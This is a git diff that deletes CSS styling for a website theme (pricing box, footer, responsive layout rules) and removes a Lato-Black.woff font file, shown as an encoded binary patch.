-        text-decoration: underline; }
-  #components p {
-    max-width: 220px;
-    margin: auto;
-    font-size: 13px;
-    line-height: 20px;
-    color: rgba(0, 0, 0, 0.5); }
-  #components #docs-search-results p {
-    max-width: none;
-    margin-bottom: 16px; }
-
-.demo-head {
-  font-size: 24px;
-  line-height: 32px;
-  font-weight: 900;
-  margin-top: 80px;
-  margin-bottom: 20px;
-  text-align: center; }
-
-#price-box {
-  margin-top: 40px; }
-  #price-box .item {
-    text-align: center;
-    padding: 36px;
-    margin-bottom: 24px; }
-  #price-box .item-selected {
-    position: relative;
-    top: -28px;
-    background: #fafaf4; }
-  #price-box .price-label {
-    position: absolute;
-    top: -12px;
-    left: 50%;
-    margin-left: -60px;
-    background: #ff3366;
-    color: #fff;
-    font-size: 11px;
-    text-transform: uppercase;
-    padding: 0 8px; }
-  #price-box .price-name {
-    font-size: 12px;
-    text-transform: uppercase;
-    line-height: 24px;
-    font-weight: 900; }
-  #price-box .price-amount {
-    margin: 20px 0 32px 0;
-    font-size: 34px; }
-  #price-box ul {
-    margin-left: 0;
-    list-style: none;
-    line-height: 36px; }
-  #price-box li {
-    font-size: 14px;
-    border-bottom: 1px solid rgba(0, 0, 0, 0.07); }
-  #price-box li:last-child {
-    border-bottom-color: transparent; }
-  #price-box footer {
-    margin-top: 32px; }
-  #price-box button.stripe-button-el {
-    height: auto;
-    min-height: 0; }
-
-#price-secure-box {
-  text-align: center;
-  color: rgba(0, 0, 0, 0.6); }
-  #price-secure-box .extra {
-    margin-top: 36px;
-    font-size: 14px;
-    line-height: 22px; }
-
-.not-found {
-  padding: 40px 0;
-  text-align: center;
-  font-style: italic;
-  color: rgba(0, 0, 0, 0.5); }
-
-.callout {
-  background: #f8f8f8;
-  padding: 40px 48px; }
-
-.callout-form {
-  margin-bottom: 40px; }
-
-.color-black {
-  color: #000; }
-
-tr.border-none td {
-  border: none; }
-
-#purchases-table td {
-  padding-top: 24px;
-  padding-bottom: 24px; }
-
-#purchases-table tr:first-child td {
-  padding-top: 16px; }
-
-#purchases-table tr:last-child td {
-  border-bottom: none; }
-
-.purchase-table-license {
-  margin-top: -16px;
-  margin-bottom: 8px; }
-
-.purchase-table-version {
-  display: block;
-  margin-top: 8px;
-  margin-bottom: 8px;
-  line-height: 16px;
-  font-size: 11px; }
-
-#invoice-form,
-#invoice-form-old {
-  margin-bottom: 24px;
-  padding: 40px;
-  border: 2px solid #eee; }
-
-#footer {
-  display: flex;
-  border-top: 1px solid #eee;
-  margin: 104px 0;
-  padding: 0 28px;
-  padding-top: 24px;
-  font-size: 13px;
-  color: rgba(0, 0, 0, 0.5); }
-  #footer p {
-    order: 1; }
-  #footer nav {
-    order: 2;
-    margin-left: auto; }
-  #footer nav ul {
-    display: flex; }
-  #footer nav ul li {
-    margin-left: 20px; }
-  #footer nav ul li span {
-    color: rgba(0, 0, 0, 0.3); }
-  #footer nav ul li a {
-    color: rgba(0, 0, 0, 0.65);
-    text-decoration: none; }
-  #footer nav ul li a:hover {
-    color: #000;
-    text-decoration: underline; }
-
-@media (max-width: 768px) {
-  #top {
-    display: block;
-    height: auto;
-    padding-bottom: 24px; }
-    #top ul {
-      display: block; }
-    #top #top-brand {
-      display: none; }
-    #top #top-nav-main {
-      padding: 0;
-      border: none; }
-    #top #top-nav-extra {
-      margin: 0; }
-    #top #top-nav-main li,
-    #top #top-nav-extra li {
-      text-align: center;
-      width: auto;
-      margin: 16px 0;
-      padding: 0; }
-  #subnav li,
-  #subnav ul li {
-    text-align: center;
-    border: none;
-    display: block;
-    margin: 16px 0; }
-  #hero {
-    margin-top: 32px;
-    padding-top: 0;
-    padding-left: 20px;
-    padding-right: 20px; }
-    #hero h1 {
-      font-size: 40px;
-      line-height: 48px; }
-    #hero p {
-      font-size: 16px;
-      line-height: 24px; }
-  #posts,
-  #post-box,
-  #main {
-    padding-left: 20px;
-    padding-right: 20px; }
-  #action-buttons .button,
-  #action-buttons button {
-    margin: 8px 0; }
-  #footer {
-    display: block;
-    text-align: center; }
-    #footer nav ul {
-      display: block;
-      margin-bottom: 40px; }
-    #footer nav ul li {
-      margin: 8px 0; }
-  #grafs-features ul {
-    margin-bottom: 24px; }
-  #grafs-features ul.br {
-    border: none; }
-  #grafs-features ul.br li,
-  #grafs-features ul li {
-    text-align: center; }
-  .grafs-call-to-action p {
-    font-size: 20px;
-    line-height: 32px; }
-  #docs-main {
-    display: block; }
-    #docs-main #side,
-    #docs-main #area {
-      width: 100%;
-      padding: 20px 0;
-      border: none; }
-  .grafs-examples-row {
-    flex-direction: column; }
-  .grafs-examples-col {
-    width: 100%;
-    margin: 0;
-    margin-bottom: 20px; }
-  #price-box .item-selected {
-    margin-top: 24px;
-    top: 0; } }
diff --git a/website/src/themes/kube/static/font/Lato-Black.woff b/website/src/themes/kube/static/font/Lato-Black.woff
deleted file mode 100644
index a0ab25e9afc5300e204cfff09f30dfc498bc9dba..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 297272
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
